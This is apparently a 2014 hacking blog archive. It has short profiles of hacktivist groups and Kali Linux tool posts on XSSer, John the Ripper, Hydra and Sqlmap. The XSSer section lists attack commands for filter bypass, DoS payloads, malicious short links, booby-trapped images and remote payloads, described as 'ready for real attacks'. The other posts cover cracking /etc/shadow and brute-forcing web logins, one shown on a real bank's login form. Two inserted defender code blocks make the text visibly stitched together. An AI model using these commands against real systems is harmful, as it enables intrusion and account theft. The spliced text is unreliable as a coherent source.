Sunday, 23 November 2014

Anonymous

Anonymous (used as a mass noun) is a loosely associated international network of activist and hacktivist entities. A website nominally associated with the group describes it as "an internet gathering" with "a very loose and decentralized command structure that operates on ideas rather than directives". The group became known for a series of well-publicized publicity stunts and distributed denial-of-service (DDoS) attacks on government, religious, and corporate websites.
Anonymous originated in 2003 on the imageboard 4chan, representing the concept of many online and offline community users simultaneously existing as an anarchic, digitized global brain. Anonymous members (known as "Anons") can be distinguished in public by the wearing of stylised Guy Fawkes masks.
In its early form, the concept was adopted by a decentralized online community acting anonymously in a coordinated manner, usually toward a loosely self-agreed goal, and primarily focused on entertainment, or "lulz". Beginning with 2008's Project Chanology (a series of protests, pranks, and hacks targeting the Church of Scientology), the Anonymous collective became increasingly associated with collaborative hacktivism on a number of issues internationally. Individuals claiming to align themselves with Anonymous undertook protests and other actions (including direct action) in retaliation against anti-digital piracy campaigns by motion picture and recording industry trade associations. Later targets of Anonymous hacktivism included government agencies of the US, Israel, Tunisia, Uganda, and others; child pornography sites; copyright protection agencies; the Westboro Baptist Church; and corporations such as PayPal, MasterCard, Visa, and Sony. Anons have publicly supported WikiLeaks and the Occupy movement. Related groups LulzSec and Operation AntiSec carried out cyberattacks on US government agencies, media, video game companies, military contractors, military personnel, and police officers, resulting in the attention of law enforcement to the groups' activities. It has been described as being anti-Zionist, has threatened to erase Israel from the Internet, and engaged in the "#OpIsrael" cyber-attacks on Israeli websites on Yom HaShoah (Holocaust Remembrance Day) in 2013.
Dozens of people have been arrested for involvement in Anonymous cyberattacks, in countries including the US, UK, Australia, the Netherlands, Spain, and Turkey. Evaluations of the group's actions and effectiveness vary widely. Supporters have called the group "freedom fighters" and digital Robin Hoods, while critics have described them as "a cyber lynch-mob" or "cyber terrorists". In 2012, Time called Anonymous one of the "100 most influential people" in the world.

LulzSec

Lulz Security, commonly abbreviated as LulzSec, was a black hat computer hacker group that claimed responsibility for several high profile attacks, including the compromise of user accounts from Sony Pictures in 2011. The group also claimed responsibility for taking the CIA website offline. Some security professionals have commented that LulzSec has drawn attention to insecure systems and the dangers of password reuse. It has gained attention due to its high profile targets and the sarcastic messages it has posted in the aftermath of its attacks. One of the founders of LulzSec was a computer security specialist who used the online moniker Sabu. The man accused of being Sabu has helped law enforcement track down other members of the organization as part of a plea deal. At least four associates of LulzSec were arrested in March 2012 as part of this investigation. British authorities had previously announced the arrests of two teenagers they allege are LulzSec members T-flow and Topiary.

At just after midnight (BST, UT+01) on 26 June 2011, LulzSec released a "50 days of lulz" statement, which they claimed to be their final release, confirming that LulzSec consisted of six members, and that their website is to be shut down.[1] This breaking up of the group was unexpected.[4] The release included accounts and passwords from many different sources. Despite claims of retirement, the group committed another hack against newspapers owned by News Corporation on 18 July, defacing them with false reports regarding the death of Rupert Murdoch. The group helped launch Operation AntiSec, a joint effort involving LulzSec, Anonymous, and other hackers.

Syrian Electronic Army

The Syrian Electronic Army (SEA) is a group of computer hackers supervised by the Syrian Assad regime. Using spamming, defacement, malware (including the Blackworm tool), phishing, and denial of service attacks, it mainly targets political opposition groups and western websites including news organizations and human rights groups. The Syrian Electronic Army claims to be "a group of enthusiastic Syrian youths who could not stay passive towards the massive distortion of facts about the recent uprising in Syria"; however, the SEA is believed by experts to be "a state-supervised operation" that is linked to the Assad regime. The SEA is thought to be the first public, virtual army in the Arab world to openly launch cyber attacks on its opponents.

Activities

The SEA's tone and style vary widely from the serious and openly political to ironic statements intended as often critical or pointed humor: SEA had "Exclusive: Terror is striking the #USA and #Obama is Shamelessly in Bed with Al-Qaeda" tweeted from the Twitter account of 60 Minutes, and in July 2012 posted "Do you think Saudi and Qatar should keep funding armed gangs in Syria in order to topple the regime? #Syria," from Al Jazeera's Twitter account before the message was removed. In another attack, members of SEA used the BBC Weather Channel Twitter account to post the headline, "Saudi weather station down due to head on-collision with camel." One commentator notes that "[SEA] volunteers might include Syrian diaspora; some of their hacks have used colloquial English and reddit memes. After Washington Post reporter Max Fisher called their jokes unfunny, one hacker associated with the group told a Vice interview 'haters gonna hate.'"

Wednesday, 19 November 2014

Kali Linux : XSSER

Installation

XSSer runs on many platforms. It requires Python and the following libraries:

- python-pycurl - Python bindings to libcurl
- python-beautifulsoup - error-tolerant HTML parser for Python
- python-libxml2 - Python bindings for the GNOME XML library
- python-geoip - Python bindings for the GeoIP IP-to-country resolver library

On Debian-based systems (ex: Ubuntu), run:

sudo apt-get install python-pycurl python-beautifulsoup python-libxml2 python-geoip

Usage

xsser [OPTIONS] [-u <url> | -i <file> | -d <dork>] [-g <getdata> | -p <postdata> | -c <crawling>] [Request(s)] [Vector(s)] [Bypasser(s)] [Technique(s)] [Final Injection(s)]

Options:
  --version              show program's version number and exit
  -h, --help             show this help message and exit
  -s, --statistics       show advanced statistics output results
  -v, --verbose          active verbose mode output results
  --gtk                  launch XSSer GTK Interface (Wizard included!)

*Special Features*:
You can choose Vector(s) and Bypasser(s) to inject code with these extra special features:

  --imx=IMX              create a false image with XSS code embedded
  --fla=FLASH            create a false .swf file with XSS code embedded

*Select Target(s)*:
At least one of these options has to be specified to set the source to get target(s) urls from.
You need to choose one to run XSSer:

  -u URL, --url=URL      Enter target(s) to audit
  -i READFILE            Read target URLs from a file
  -d DORK                Process search engine dork results as target urls
  --De=DORK_ENGINE       Search engine to use for dorking (bing, altavista,
                         yahoo, baidu, yandex, youdao, webcrawler, google, etc.
                         See dork.py file to check for available engines)

*Select type of HTTP/HTTPS Connection(s)*:
These options can be used to specify which parameter(s) we want to use as the payload to inject code into.

  -g GETDATA             Enter payload to audit using GET. (ex: '/menu.php?q=')
  -p POSTDATA            Enter payload to audit using POST. (ex: 'foo=1&bar=')
  -c CRAWLING            Number of urls to crawl on target(s): 1-99999
  --Cw=CRAWLING_WIDTH    Depth level of crawler: 1-5
  --Cl                   Crawl only local target(s) urls (default TRUE)

*Configure Request(s)*:
These options can be used to specify how to connect to target(s) payload(s).
You can choose multiple:

  --cookie=COOKIE        Change your HTTP Cookie header
  --drop-cookie          Ignore Set-Cookie header from response
  --user-agent=AGENT     Change your HTTP User-Agent header (default SPOOFED)
  --referer=REFERER      Use another HTTP Referer header (default NONE)
  --xforw                Set your HTTP X-Forwarded-For with random IP values
  --xclient              Set your HTTP X-Client-IP with random IP values
  --headers=HEADERS      Extra HTTP headers newline separated
  --auth-type=ATYPE      HTTP Authentication type (Basic, Digest, GSS or NTLM)
  --auth-cred=ACRED      HTTP Authentication credentials (name:password)
  --proxy=PROXY          Use proxy server (tor: http://localhost:8118)
  --ignore-proxy         Ignore system default HTTP proxy
  --timeout=TIMEOUT      Select your timeout (default 30)
  --retries=RETRIES      Retries when the connection timeouts (default 1)
  --threads=THREADS      Maximum number of concurrent HTTP requests (default 5)
  --delay=DELAY          Delay in seconds between each HTTP request (default 0)
  --tcp-nodelay          Use the TCP_NODELAY option
  --follow-redirects     XSSer will follow server redirection responses (302)
  --follow-limit=FLI     Set how many times XSSer will follow redirections (default 50)

*Checker Systems*:
These options are useful to learn whether your target(s) have filters against XSS attacks,
to reduce 'false positive' results and to perform more advanced tests:

  --no-head              do NOT verify the stability of the url (codes: 200|302) with a HEAD pre-check request
  --alive=ISALIVE        set after how many errors XSSer must verify that the target is alive
  --hash                 send a unique hash, without vectors, to pre-check whether target(s) echo all content received
  --heuristic            launch a heuristic test to discover which parameters are filtered on target(s) code: ;\/<>"'=
  --checkaturl=ALT       check for a valid XSS response from target(s) at an alternative url ('blind XSS')
  --checkmethod=ALTM     check responses from target(s) using a different connection type: GET or POST (default: GET)
  --checkatdata=ALD      check responses from target(s) using an alternative payload (default: same as first injection)
  --reverse-check        establish a reverse connection from target(s) to XSSer to certify that it is 100% vulnerable

*Select Vector(s)*:
These options can be used to specify the XSS vector source code to inject in each payload.
Specify one only if you do not want the common XSS vector that is used by default.
Choose only one option:

  --payload=SCRIPT       OWN - Insert your XSS construction -manually-
  --auto                 AUTO - Insert XSSer 'reported' vectors from file (HTML5 vectors included!)

*Select Bypasser(s)*:
These options can be used to encode selected vector(s) to try to bypass all possible anti-XSS filters
on target(s) code and some IPS rules, if the target uses them. They can also be combined with other techniques to provide encoding:

  --Str                  Use method String.FromCharCode()
  --Une                  Use function Unescape()
  --Mix                  Mix String.FromCharCode() and Unescape()
  --Dec                  Use Decimal encoding
  --Hex                  Use Hexadecimal encoding
  --Hes                  Use Hexadecimal encoding, with semicolons
  --Dwo                  Encode vectors IP addresses in DWORD
  --Doo                  Encode vectors IP addresses in Octal
  --Cem                  Try -manually- different Character Encoding mutations
                         (reverse obfuscation: good) -> (ex:'Mix,Une,Str,Hex')
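The defender's counterpart to the bypassers listed above is a normaliser that peels those encodings off before a filter or log review inspects the value. The following is an added example, not part of XSSer: it undoes String.fromCharCode(), unescape(), decimal and hex entities (with or without semicolons) and repeats until the text stops changing, so chained mutations of the --Cem kind are also unwound; the sample payloads are constructed.

```python
"""Defender-side normaliser for the encodings XSSer's Bypasser(s) apply:
String.fromCharCode(), unescape(), decimal entities (--Dec), hex entities
with and without semicolons (--Hex/--Hes) and chained mutations (--Cem).
Added example, not part of XSSer; sample payloads are constructed."""
import re
import urllib.parse

# String.fromCharCode(60,115,99,...) -> the characters those code points spell
FROMCHARCODE_RE = re.compile(r"String\.fromCharCode\(\s*([\d\s,]*)\)", re.IGNORECASE)
# unescape('%3Cscript%3E') -> percent-decoded text (the %uXXXX form is not handled here)
UNESCAPE_RE = re.compile(r"unescape\(\s*(['\"])(.*?)\1\s*\)", re.IGNORECASE | re.DOTALL)
# &#60; &#x3c; and the semicolon-less forms browsers also accept
NUM_ENTITY_RE = re.compile(r"&#([xX][0-9a-fA-F]+|[0-9]+);?")
# What the decoded text is checked against once the layers are peeled off
SUSPICIOUS_RE = re.compile(r"<\s*script|<\s*iframe|javascript:|\bon\w+\s*=", re.IGNORECASE)


def _from_char_code(match):
    # JavaScript truncates each argument to 16 bits, so mirror that
    codes = [c for c in match.group(1).replace(" ", "").split(",") if c]
    return "".join(chr(int(c) % 0x10000) for c in codes)


def _entity(match):
    body = match.group(1)
    code_point = int(body[1:], 16) if body[0] in "xX" else int(body)
    return chr(code_point) if code_point < 0x110000 else match.group(0)


def normalize(payload, max_rounds=5):
    """Undo the known encodings until the text stops changing.  A chain such
    as --Cem 'Hex,Str,Hex' needs several rounds, so decoding is repeated."""
    text = payload
    for _ in range(max_rounds):
        before = text
        text = FROMCHARCODE_RE.sub(_from_char_code, text)
        text = UNESCAPE_RE.sub(lambda m: urllib.parse.unquote(m.group(2)), text)
        text = NUM_ENTITY_RE.sub(_entity, text)
        text = urllib.parse.unquote(text)   # plain URL-encoding of the parameter
        if text == before:
            break
    return text


def is_suspicious(payload):
    """True when the fully decoded form contains script-bearing markup."""
    return bool(SUSPICIOUS_RE.search(normalize(payload)))


if __name__ == "__main__":
    for sample in ["&#60;script&#62;alert(1)&#60;/script&#62;",
                   "String.fromCharCode(60,115,99,114,105,112,116,62)",
                   "unescape('%3Cscript%3E')",
                   "&#x26;&#x23;60&#x3b;script&#x26;&#x23;62&#x3b;",   # double-encoded
                   "season=summer"]:
        print(f"{sample!r:60} -> {normalize(sample)!r} suspicious={is_suspicious(sample)}")
```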

*Special Technique(s)*:
These options can be used to try to inject code using different types of XSS techniques. You can choose multiple:

  --Coo                  COO - Cross Site Scripting Cookie injection
  --Xsa                  XSA - Cross Site Agent Scripting
  --Xsr                  XSR - Cross Site Referer Scripting
  --Dcp                  DCP - Data Control Protocol injections
  --Dom                  DOM - Use Anchor Stealth (DOM shadows!)
  --Ind                  IND - HTTP Response Splitting Induced code
  --Anchor               ANC - Use Anchor Stealth payloader (DOM shadows!)
  --Phpids               PHP - Exploit PHPIDS bug (0.6.5) to bypass filters

*Select Final injection(s)*:
These options can be used to specify the final code to inject in vulnerable target(s). Important if you want to exploit
your discovered vulnerabilities in the wild. Choose only one option:

  --Fp=FINALPAYLOAD      OWN - Insert your final code to inject -manually-
  --Fr=FINALREMOTE       REMOTE - Insert your final code to inject -remotely-
  --Doss                 DOSs - XSS Denial of service (server) injection
  --Dos                  DOS - XSS Denial of service (client) injection
  --B64                  B64 - Base64 code encoding in META tag (rfc2397)

*Special Final injection(s)*:
These options can be used to execute some 'special' injection(s) in vulnerable target(s).
You can select multiple and combine them with your final code (except with DCP code):

  --Onm                  ONM - Use onMouseMove() event to inject code
  --Ifr                  IFR - Use "iframe" source tag to inject code

*Miscellaneous*:

  --silent               inhibit console output results
  --update               check for XSSer latest stable version
  --save                 output all results directly to template (XSSlist.dat)
  --xml=FILEXML          output 'positives' to an XML file (--xml filename.xml)
  --short=SHORTURLS      display -final code- shortened (tinyurl, is.gd)
  --launch               launch a browser at the end with each XSS discovered
  --tweet                publish each XSS discovered into the 'Grey Swarm!'
  --tweet-tags=TT        add more tags to your XSS discovered publications (default: #xss) - (ex: #xsser #vulnerability)

Examples

If you have interesting examples of XSSer usage, please send an email to the mailing list.
-------------------
* Simple injection from URL:

$ python xsser.py -u "http://host.com"
-------------------
* Simple injection from File, with tor proxy and spoofing HTTP Referer headers:

$ python xsser.py -i "file.txt" --proxy "http://127.0.0.1:8118" --referer "666.666.666.666"
-------------------
* Multiple injections from URL, with automatic payloading, using tor proxy, injecting on payloads character encoding in "Hexadecimal", with verbose output and saving results to file (XSSlist.dat):

$ python xsser.py -u "http://host.com" --proxy "http://127.0.0.1:8118" --auto --Hex --verbose -w
-------------------
* Multiple injections from URL, with automatic payloading, using character encoding mutations (first, change payload to hexadecimal; second, change the first encoding to String.fromCharCode; third, re-encode the second encoding to hexadecimal), with HTTP User-Agent spoofed, changing timeout to "20" and using multithreads (5 threads):

$ python xsser.py -u "http://host.com" --auto --Cem "Hex,Str,Hex" --user-agent "XSSer!!" --timeout "20" --threads "5"
-------------------
* Advanced injection from File, using your -own- payload and Unescape() character encoding to bypass filters:

$ python xsser.py -i "urls.txt" --payload 'a="get";b="URL(\"";c="javascript:";d="alert('XSS');\")";eval(a+b+c+d);' --Une
-------------------
* Injection from Dork selecting "duck" engine (XSSer Storm!):

$ python xsser.py --De "duck" -d "search.php?"
-------------------
* Injection from Crawler with depth 3 and 4 pages to see (XSSer Spider!):

$ python xsser.py -c3 --Cw=4 -u "http://host.com"
-------------------
* Simple injection from URL, using POST, with statistics results:

$ python xsser.py -u "http://host.com" -p "index.php?target=search&subtarget=top&searchstring=" -s
-------------------
* Multiple injections from URL to a parameter sent with GET, using automatic payloading, with IP Octal payload obfuscation and printing results as a "tinyurl" shortened link (ready to share!):

$ python xsser.py -u "http://host.com" -g "bs/?q=" --auto --Doo --short tinyurl 
-------------------
* Simple injection from URL, using GET, injecting a vector in the Cookie parameter, trying to use a DOM shadow space (no server logging!) and, if any "hole" exists, applying your manual final payload "malicious" code (ready for real attacks!):

$ python xsser.py -u "http://host.com" -g "bs/?q=" --Coo --Dom --Fr="!enter your final injection code here!"
-------------------
* Simple injection from URL, using GET and trying to generate from the results a "malicious" shortened link (is.gd) with a valid DoS (Denial of Service) browser client payload:

$ python xsser.py -u "http://host.com" -g "bs/?q=" --Dos --short "is.gd"
-------------------
* Multiple injections to multiple places, extracting targets from a list in a FILE, applying automatic payloading, changing timeout to "20" and using multithreads (5 threads), increasing the delay between requests to 10 seconds, injecting parameters in the HTTP User-Agent, HTTP Referer and Cookie parameters, using the Tor proxy, with IP Octal obfuscation, with statistics results, in verbose mode and creating shortened links (tinyurl) of any valid injection payloads found (real playing mode!):

$ python xsser.py -i "list_of_url_targets.txt" --auto --timeout "20" --threads "5" --delay "10" --Xsa --Xsr --Coo --proxy "http://127.0.0.1:8118" --Doo -s --verbose --Dos --short "tinyurl"
-------------------
* Injection of a user XSS vector directly into a malicious -fake- image created "in the wild", ready to be uploaded:

$ python xsser.py --Imx "test.png" --payload "!enter your malicious injection code here!" 
-------------------
* Report output 'positives' injections of a dorking search (using "ask" dorker) directly to a XML file.

$ python xsser.py -d "login.php" --De "ask" --xml "security_report_XSSer_Dork_cuil.xml" 
-------------------
* Publish output 'positives' injections of a dorking search (using "duck" dorker) directly to http://identi.ca
(federated XSS pentesting botnet)

$ python xsser.py -d "login.php" --De "duck" --tweet

* Examples online:

http://identi.ca/xsserbot01
http://twitter.com/xsserbot01
-------------------
* Create a .swf movie with XSS code injected

$ python xsser.py --fla "name_of_file"
-------------------
* Send a pre-checking hash to see if target will generate -false positive- results

$ python xsser.py -u "host.com" --hash
-------------------
* Multiple fuzzing injections from url, including DCP injections and exploiting our "own" code, spoofed in a shortened link, on positive results found. XSS real-time exploiting.

$ python xsser.py -u "host.com" --auto --Dcp --Fp "enter_your_code_here" --short "is.gd"
-------------------
* Exploiting Base64 code encoding in META tag (rfc2397) in a manual payload of a vulnerable target.

$ python xsser.py -u "host.com" -g "vulnerable_path" --payload "valid_vector_injected" --B64
-------------------
* Exploiting our "own" -remote code- in a payload discovered using fuzzing and launch it in a browser directly

$ python xsser.py -u "host.com" -g "vulnerable_path" --auto --Fr "my_host/path/code.js" --launch

Saturday, 15 November 2014

Kali Linux : Sources.list And Manual Update

We’ve seen many people break their Kali Linux installations by following unofficial advice, or arbitrarily populating their sources.list file with unneeded repositories. The following post aims to clarify what repositories should exist in sources.list, and when they should be used.
Any additional repositories added to the Kali sources.list file will most likely BREAK YOUR KALI LINUX INSTALL.
NOTE: AFTER EDITING YOUR SOURCES LIST, RUN:
apt-get update && apt-get upgrade && apt-get dist-upgrade

Regular repositories

On a standard, clean install of Kali Linux, you should have the following two entries present in /etc/apt/sources.list:
deb http://http.kali.org/kali kali main non-free contrib
deb http://security.kali.org/kali-security kali/updates main contrib non-free
You can find a list of official Kali Linux mirrors here.

Source repositories

In case you require source packages, you might also want to add the following repositories as well:
deb-src http://http.kali.org/kali kali main non-free contrib
deb-src http://security.kali.org/kali-security kali/updates main contrib non-free

Bleeding Edge repositories

If you have a need for bleeding edge repositories, you can add the following entry. Do not add this repo “for the heck of it” – it’s called “bleeding edge” for a reason. Packages in this repository are NOT manually maintained (they are auto-generated), and are low priority in general.
deb http://repo.kali.org/kali kali-bleeding-edge main
#deb-src http://repo.kali.org/kali kali-bleeding-edge main

Kali Linux : John The Ripper


For those of you who haven't yet heard about John the Ripper (hereafter called John for brevity), it is a free password cracking tool written mostly in C. Before going any further, we must tell you that although we trust our readers, we do not encourage or condone any malicious activities that may be performed using this tool or any other tools we talked about in the past. Security-related tools are often like a double-edged sword, in that they can be used for good but also for bad things. So although it might sound tempting, we recommend you to refrain from any damaging activities, if for nothing else, just because you have great chances to land in a jail cell.

1. Introduction

This article will deal with John from a system administrator's perspective, so we expect you to have intermediate knowledge about your Linux system, whatever distribution that may be, and that you are a security-conscious person with basic security knowledge. However, this article might also appeal to you if you are a home user wanting to learn about these kinds of things, but be warned: some of the commands presented below will ask a great deal of your CPU time, so it would be better if you had a test machine and/or lots of time and patience, because password cracking attempts may take days, even on a relatively new machine. As usual, please refer to our new Linux Forum for additional help or information.

2. Installing John

Although, at least on the distributions we tried, the package is simply named "john" (with Gentoo making an exception and naming it "johntheripper"), we will make it easy for you and show you how to install it on several well-known distributions.

2.1. Debian

Debian differs from other distributions that offer John in their repositories because it offers a nice manual page, although upstream doesn't have one. To install, simply type
 # aptitude install john 

2.2. Fedora

On Fedora, it's also as simple as doing
 # yum install john 

2.3. Arch Linux

 # pacman -S john 

2.4. OpenSuse Linux

# zypper install john

2.5. Gentoo

As we said, Gentoo's package is named differently from what others offer, so here you will have to run
 # emerge johntheripper

2.6. Slackware

Although there doesn't seem to be a john package in the official repositories, there is a slackbuild that gets John installed on your system (this was tested on Slackware 13.37).
Although we gave you just a few examples of how you can get John on your Linux system, many of the examples presented will run if you have another OS installed: besides source code, the project offers the program for BeOS, Microsoft Windows, Solaris and Mac OS X. But for our article, as the title says, we tested the examples on Linux.

3. Using John the Ripper

You need not worry about cryptic configuration files, as John is ready to use with the appropriate command-line flags with no other effort on your part. One word of warning, though: as you already noticed, we tell our readers when they should use root privileges and when they shouldn't. Except when noted, you are strongly recommended to use your normal everyday user (or another, if you prefer, but it shouldn't have super user rights). On my Debian system, John is available as /usr/sbin/john, so if you don't find it we recommend you use whereis and type the whole path when running john unprivileged (or you can simply create an alias).
The simplest way to get your feet wet is to type
 $ /usr/sbin/john --test 
for doing some tests and benchmarks on John's capabilities. If you have no idea what Kerberos, MD5, DES or Blowfish are, we recommend you start reading some basic security books, because, like we said before, you need some security/administration background. Now, let's create a text file in password format (<user>:<hash>) with a valid hash, of course, and get John to work. You can simply copy a user from /etc/shadow, but we recommend something simpler, because we presume you want to see the results as fast as you can. So create a file named password.txt somewhere inside your /home and put this in it:
myuser:AZl.zWwxIh15Q
Save the file, then simply feed it to John with no arguments (for now):
 $ /usr/sbin/john password.txt 
We must repeat our warning: password cracking is a CPU-intensive and long process, so depending on your system, that might take quite a while. However, this also depends on what you want to achieve, because if your powerful CPU has been crunching at the password(s) for days with no outcome, it's only safe to say that it's a good password. But if the password is really critical, leave the system alone until John finishes its work to make sure everything is alright. Like we said before, this could take many days.
Now, if you have a powerful box with the sole purpose of testing passwords, which is always a good thing given the means, you can try your real-life passwords with John. One way is to use /etc/shadow directly, but we recommend you take a somewhat different course. Note that this applies to systems using shadow passwords, and all the modern Linux distributions do. John offers a nifty utility called unshadow, which we will use to create a file from our passwd and shadow files:
 # unshadow /etc/passwd /etc/shadow > mypasswd.txt 
Now make sure that mypasswd.txt is available to your normal user and do
 $ /usr/sbin/john mypasswd.txt 
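The <user>:<hash> file John consumes also tells a sysadmin a lot before any cracking starts: the hash prefix names the scheme, and legacy schemes are the ones worth rehashing first. The following is an added example, not John's own code: it performs the passwd/shadow join that unshadow does, then classifies each hash by its crypt(3) identifier. The passwd and shadow records are constructed (the sha512crypt and md5crypt values are placeholders), apart from the DES hash taken from the article above.

```python
"""Sysadmin-side view of the <user>:<hash> input John takes: merge passwd
and shadow the way the unshadow utility does, then classify each hash by its
crypt(3) prefix so legacy formats show up without running a cracker at all.
Added example, not John's own code; the records below are constructed, apart
from the DES hash used in the article."""

# crypt(3) identifier prefix -> scheme.  Traditional DES crypt has no prefix
# and is always 13 characters from the [./0-9A-Za-z] alphabet.
CRYPT_PREFIXES = {
    "$1$": "md5crypt",
    "$2a$": "bcrypt", "$2b$": "bcrypt", "$2y$": "bcrypt",
    "$5$": "sha256crypt",
    "$6$": "sha512crypt",
    "$7$": "scrypt",
    "$y$": "yescrypt",
}
DES_ALPHABET = set("./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz")
LEGACY = {"descrypt", "md5crypt"}   # fast to brute-force; descrypt also truncates at 8 chars


def classify_hash(field):
    """Name the scheme of one shadow password field."""
    if field == "":
        return "empty"                      # no password required at all
    if field.startswith(("!", "*")):
        return "locked"                     # login disabled, hash (if any) unusable
    for prefix, scheme in CRYPT_PREFIXES.items():
        if field.startswith(prefix):
            return scheme
    if len(field) == 13 and set(field) <= DES_ALPHABET:
        return "descrypt"
    return "unknown"


def unshadow(passwd_lines, shadow_lines):
    """Replace the 'x' in passwd's second field with the hash from shadow,
    keyed on the login name: the same join unshadow(8) performs."""
    hashes = {}
    for line in shadow_lines:
        line = line.rstrip("\n")
        if line and not line.startswith("#"):
            name, pw_field = line.split(":")[:2]
            hashes[name] = pw_field
    merged = []
    for line in passwd_lines:
        fields = line.rstrip("\n").split(":")
        if len(fields) != 7:
            continue                        # skip comments / malformed lines
        fields[1] = hashes.get(fields[0], fields[1])
        merged.append(":".join(fields))
    return merged


def audit(merged_lines):
    """Return (user, uid, scheme) triples for accounts worth a second look."""
    findings = []
    for line in merged_lines:
        user, pw_field, uid = line.split(":")[:3]
        scheme = classify_hash(pw_field)
        if scheme in LEGACY or scheme == "empty":
            findings.append((user, int(uid), scheme))
    return findings


# Constructed sample data; the $6$ and $1$ values are placeholders, not real hashes.
PASSWD = [
    "root:x:0:0:root:/root:/bin/bash",
    "myuser:x:1000:1000:My User:/home/myuser:/bin/bash",
    "legacy:x:1001:1001::/home/legacy:/bin/sh",
    "svc:x:1002:1002::/nonexistent:/usr/sbin/nologin",
]
SHADOW = [
    "root:$6$constructedsalt$PLACEHOLDERHASHVALUE:16390:0:99999:7:::",
    "myuser:AZl.zWwxIh15Q:16390:0:99999:7:::",      # the DES hash from the article
    "legacy:$1$salt1234$PLACEHOLDERMD5CRYPT:16390:0:99999:7:::",
    "svc:*:16390:0:99999:7:::",
]

if __name__ == "__main__":
    for user, uid, scheme in audit(unshadow(PASSWD, SHADOW)):
        print(f"{user} (uid {uid}): {scheme} - rehash with a modern scheme")
```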
John will try single crack mode first, then wordlist mode, then incremental. In John's terms, a mode is a method it uses to crack passwords. As you know, there are many kinds of attacks: dictionary attacks, brute force attacks, and so on. Well, this is roughly what John's modes are. As some of you might have realized, wordlist mode is basically a dictionary attack. Besides these three modes enumerated above, John also supports another one called external mode. You can select what mode to use with, for example, --single, --external and so on. We recommend you check out the documentation over at openwall.com for a good but brief description of every mode. But of course we will tell you, in short, what every mode does.
John the Ripper's documentation recommends starting with single crack mode, mostly because it's faster and even faster if you use multiple password files at a time. Incremental mode is the most powerful mode available, as it will try various combinations when cracking, and you can choose what kind of mode (mode applied to the incremental option) to use, including your own. External mode, as the name implies, will use custom functions that you write yourself, while wordlist mode takes a word list specified as an argument to the option (it can be a file with a list of words written one per line, or stdin) and tries a simple dictionary attack on passwords.
If John is successful in cracking one of the passwords, it will write to ~/.john/john.pot. However, that file isn't human-readable, so you can read cracked passwords with
 $ /usr/sbin/john --show mypasswd.txt
To check if the root password got cracked, filter by UID:
 $ /usr/sbin/john --show --users=0 mypasswd.txt
Of course, John knows about wildcards and multiple files:
 $ /usr/sbin/john --show --users=0 *passwd*
Just as you can filter by user, you can also filter by group, by using the --groups flag, and that filtering is available also when cracking. Going further to wordlist mode, here's how you can use it with the built-in mangling rules enabled:
 $ /usr/sbin/john --wordlist=passwd.lst --rules passwd.txt
John also allows you to create multiple named sessions, which is practical, because since John can take lots of time to complete a task, you can later view all sessions running to decide which one to kill. The option for named sessions is --session=taskname and you can use --status or --status=taskname to see all or certain sessions. But there's more: you can restore sessions or particular ones by name using --restore or --restore=taskname. A few examples:
 $ /usr/sbin/john --session=allrules --wordlist=all.lst --rules mypasswd.txt
 $ /usr/sbin/john --status=allrules
 $ ps aux | grep john # get the PID of the john session you want to kill
 $ kill -HUP $PID_of_john_session_to_kill
 $ /usr/sbin/john --restore=allrules
Here are some examples of using incremental mode with John:
 $ /usr/sbin/john --incremental mypasswd.txt
 $ /usr/sbin/john --incremental=alpha mypasswd.txt
Of course, this isn't a replacement for John's documentation. Although, as we said, it doesn't offer a manual page, you will find lots of documentation on its page, as well as a useful wiki. For example, you will notice that even if you're running John on a multiprocessor machine, it will use only one core, usually the first. You can address this problem by reading the documentation and following the instructions there.

Kali Linux : Hydra

There is a tool that is excellent for cracking online passwords and it is called THC-Hydra. Fortunately, it is built into our Kali distribution, so we don't need to download, install, or compile anything to use it.

Step 1: Download & Install Tamper Data

Before we start with THC-Hydra, let's install another tool that complements THC-Hydra. This tool is known as "Tamper Data", and it is a plug-in for Mozilla's Firefox. Since our IceWeasel browser in Kali is built on the open source Firefox, it plugs equally well into Iceweasel.
Tamper Data enables us to capture and see the HTTP and HTTPS GET and POST information. In essence, Tamper Data is a web proxy similar to Burp Suite, but simpler and built right into our browser.
Tamper Data enables us to grab the information from the browser en route to the server and modify it. In addition, once we get into more sophisticated web attacks, it is crucial to know what fields and methods are being used by the web form, and Tamper Data can help us with that as well.
Let's download it from here and install it into Iceweasel.
Install the Tamper Data Firefox add-on in Iceweasel.

Step 2: Test Tamper Data

Now that we have Tamper Data installed into our browser, let's see what it can do. Activate Tamper Data and then navigate to any website. Below you can see that I have navigated to Bank of America and Tamper Data provides me with each HTTPS GET and POST request between my browser and the server.
HTTPS GET and POST requests for BOA.
When I try to login to the site with the username "hacker", Tamper Data returns to me all the critical info on the form. This information will be useful when we begin to use Hydra to crack online passwords.
Tamper Data information for BOA login.

Step 3: Open THC Hydra

Now that we have Tamper Data in place and working properly, let's open Hydra. You can find it at Kali Linux -> Password -> Online Attacks -> Hydra. You can see it about midway among the list of online password cracking tools.
Select the "hydra" tool.

Step 4: Understand the Hydra Basics

When we open Hydra, we are greeted with this help screen. Note the sample syntax at the bottom of the screen. Hydra's syntax is relatively simple and similar to other password cracking tools.
The initial help screen for Hydra.
Let's take a look at it further.
hydra -l username -p passwordlist.txt target
The username can be a single user name, such as "admin", or a username list; passwordlist is usually any text file that contains potential passwords; and target can be an IP address and port, or a specific web form field.
Although you can use ANY password text file in Hydra, Kali has several built in. Let's change directories to /usr/share/wordlists:
kali > cd /usr/share/wordlists
Then list the contents of that directory:
kali > ls
You can see below, Kali has many word lists built in. You can use any of these or any word list you download from the web as long as it was created in Linux and is in the .txt format.
The default word lists available in Kali.

Step 5: Use Hydra to Crack Passwords

In the example below, I am using Hydra to try to crack the "admin" password using the "rockyou.txt" wordlist at 192.168.89.190 on port 80.
An example of using Hydra.

Using Hydra on Web Forms

Using Hydra on web forms adds a level of complexity, but the format is similar, except that you need information on the web form parameters, which Tamper Data can provide.
The syntax for using Hydra with a web form is to use <url>:<formparameters>:<failure string> where previously we had used the target IP. We still need a username list and password list.
Probably the most critical of these parameters for web form password hacking is the "failure string". This is the string that the form returns when the username or password is incorrect. We need to capture this and provide it to Hydra so that Hydra knows when the attempted password is incorrect and can then go to the next attempt.

Kali Linux : Sqlmap

Use SQLMAP SQL Injection to hack a website and database in Kali Linux 7


